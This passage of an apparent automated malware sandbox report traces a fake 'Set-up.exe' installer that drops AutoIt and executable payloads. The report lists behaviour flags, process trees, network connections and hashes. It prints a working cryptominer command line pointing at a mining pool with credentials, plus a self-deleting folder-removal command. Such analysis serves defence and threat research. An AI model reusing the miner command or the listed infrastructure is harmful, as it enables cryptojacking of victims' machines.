f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\IObitUnlockerPortable.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\ProgramData\AAKEGDAKEH.exe | N/A |
| N/A | N/A | C:\ProgramData\DGDBAKKJKK.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\help\fxcloud.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\help\fxcloud.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\help\fxcloud.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Set-up.exe
"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
C:\Users\Admin\AppData\Local\Temp\dcom.au3
C:\Users\Admin\AppData\Local\Temp\dcom.au3
C:\ProgramData\AAKEGDAKEH.exe
"C:\ProgramData\AAKEGDAKEH.exe"
C:\ProgramData\DGDBAKKJKK.exe
"C:\ProgramData\DGDBAKKJKK.exe"
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAEHJJECAEGC" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.0.538412111\1471104155" -parentBuildID 20230214051806 -prefsHandle 1728 -prefMapHandle 1720 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c001e780-cc49-4766-b76a-fb41da8cdbeb} 648 "\\.\pipe\gecko-crash-server-pipe.648" 1820 22dff70be58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.1.976581163\812879614" -parentBuildID 20230214051806 -prefsHandle 2376 -prefMapHandle 2364 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee425386-4e5e-4c61-9d58-28581e0794e2} 648 "\\.\pipe\gecko-crash-server-pipe.648" 2404 22dfa18a258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.2.276617210\1290439756" -childID 1 -isForBrowser -prefsHandle 2960 -prefMapHandle 2956 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {913c1fd9-3ffa-4473-8f76-758d5e7183a0} 648 "\\.\pipe\gecko-crash-server-pipe.648" 2972 22d89e10258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.3.1649985592\649095188" -childID 2 -isForBrowser -prefsHandle 3764 -prefMapHandle 3760 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a12ff2f-f4cd-4feb-9871-c2ca1e1ba4ca} 648 "\\.\pipe\gecko-crash-server-pipe.648" 3744 22d8c153858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.4.1746152309\1209004020" -childID 3 -isForBrowser -prefsHandle 5184 -prefMapHandle 5176 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3b6e9ca-a2b7-4964-aa7c-382a00698092} 648 "\\.\pipe\gecko-crash-server-pipe.648" 5136 22d8dd0eb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.5.1571410426\2021279235" -childID 4 -isForBrowser -prefsHandle 5356 -prefMapHandle 5252 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {490e2181-a4a0-4f2b-9343-1f9bf802267e} 648 "\\.\pipe\gecko-crash-server-pipe.648" 5396 22d8eb2b158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.6.1448740587\813156455" -childID 5 -isForBrowser -prefsHandle 5576 -prefMapHandle 5580 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d230db5a-1035-47a5-b977-41859cfd7b04} 648 "\\.\pipe\gecko-crash-server-pipe.648" 5564 22d8eb2bd58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="648.7.172155474\401020441" -childID 6 -isForBrowser -prefsHandle 2412 -prefMapHandle 5824 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1292 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5db5ab5d-6db3-45ba-8507-70317bc9d07a} 648 "\\.\pipe\gecko-crash-server-pipe.648" 5844 22d8f408358 tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\IObitUnlockerPortable.exe
"C:\Users\Admin\Desktop\IObitUnlockerPortable.exe"
C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe
"C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe"
C:\Users\Admin\Desktop\IObitUnlockerPortable.exe
"C:\Users\Admin\Desktop\IObitUnlockerPortable.exe"
C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe
"C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" /update /restart
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe /update /restart /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
/updateInstalled /background
C:\Users\Admin\Desktop\IObitUnlockerPortable.exe
"C:\Users\Admin\Desktop\IObitUnlockerPortable.exe"
C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe
"C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe"
C:\Users\Admin\Desktop\IObitUnlockerPortable.exe
"C:\Users\Admin\Desktop\IObitUnlockerPortable.exe"
C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe
"C:\Users\Admin\Desktop\App\IObitUnlocker\IObitUnlocker.exe"
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| BE | 2.17.107.104:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | poocoin.online | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.53.55.162.in-addr.arpa | udp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.121.18.2.in-addr.arpa | udp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | businessdownloads.ltd | udp |
| US | 172.67.212.123:443 | businessdownloads.ltd | tcp |
| US | 8.8.8.8:53 | 123.212.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | i.imgur.com | udp |
| US | 199.232.192.193:443 | i.imgur.com | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | 193.192.232.199.in-addr.arpa | udp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| FI | 135.181.22.88:80 | 135.181.22.88 | tcp |
| US | 8.8.8.8:53 | 88.22.181.135.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | proresupdate.com | udp |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | 146.112.152.45.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| N/A | 127.0.0.1:53690 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 44.232.194.163:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | 163.194.232.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.5.120.34.in-addr.arpa | udp |
| N/A | 127.0.0.1:53696 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FI | 65.109.127.181:3333 | tcp | |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | workupload.com | udp |
| DE | 144.76.176.119:80 | workupload.com | tcp |
| US | 8.8.8.8:53 | workupload.com | udp |
| US | 8.8.8.8:53 | workupload.com | udp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | 119.176.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.workupload.com | udp |
| DE | 49.13.126.162:443 | t.workupload.com | tcp |
| US | 8.8.8.8:53 | t.workupload.com | udp |
| US | 8.8.8.8:53 | t.workupload.com | udp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | 162.126.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.116.9.5.in-addr.arpa | udp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | f84.workupload.com | udp |
| DE | 176.9.34.148:443 | f84.workupload.com | tcp |
| US | 8.8.8.8:53 | f84.workupload.com | udp |
| US | 8.8.8.8:53 | f84.workupload.com | udp |
| US | 8.8.8.8:53 | 148.34.9.176.in-addr.arpa | udp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | update.iobit.com | udp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 8.8.8.8:53 | 74.19.199.152.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | 140.20.199.152.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | 225.88.219.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.113.53.23.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| US | 8.8.8.8:53 | 132.194.113.52.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | logincdn.msftauth.net | udp |
| US | 152.199.21.175:443 | logincdn.msftauth.net | tcp |
| US | 152.199.21.175:443 | logincdn.msftauth.net | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.21.199.152.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp |
Files
memory/1480-0-0x0000000074530000-0x00000000746AB000-memory.dmp
memory/1480-1-0x00007FFBA12D0000-0x00007FFBA14C5000-memory.dmp
memory/1480-5-0x0000000074542000-0x0000000074544000-memory.dmp
memory/1480-6-0x0000000074530000-0x00000000746AB000-memory.dmp
memory/1480-7-0x0000000074530000-0x00000000746AB000-memory.dmp
memory/1480-9-0x0000000000400000-0x000000000061B000-memory.dmp
memory/3876-10-0x0000000074531000-0x000000007453F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9341a8d0
| MD5 | 4b6233c76d7e4d29391b7c2f79d9dbb9 |
| SHA1 | 21670d0b85fa4f7f1da0cd5504e30ec2d0f36321 |
| SHA256 | a0cb63ed609f4ffe95b9e49a5308020e2fdba6f4ce621f851afb21fa7d46ff42 |
| SHA512 | cd052a366f9f2ed80d3226fada1e5fbc638bc9661450cc179c008a895e66fa4b6bfa778e14cd6160099293bf05b85383e18143c8145bbc15cd5cbf2c5877b45a |
memory/3876-12-0x00007FFBA12D0000-0x00007FFBA14C5000-memory.dmp
memory/3876-14-0x000000007453E000-0x0000000074540000-memory.dmp
memory/3876-15-0x0000000074531000-0x000000007453F000-memory.dmp
memory/3876-19-0x0000000074531000-0x000000007453F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dcom.au3
| MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
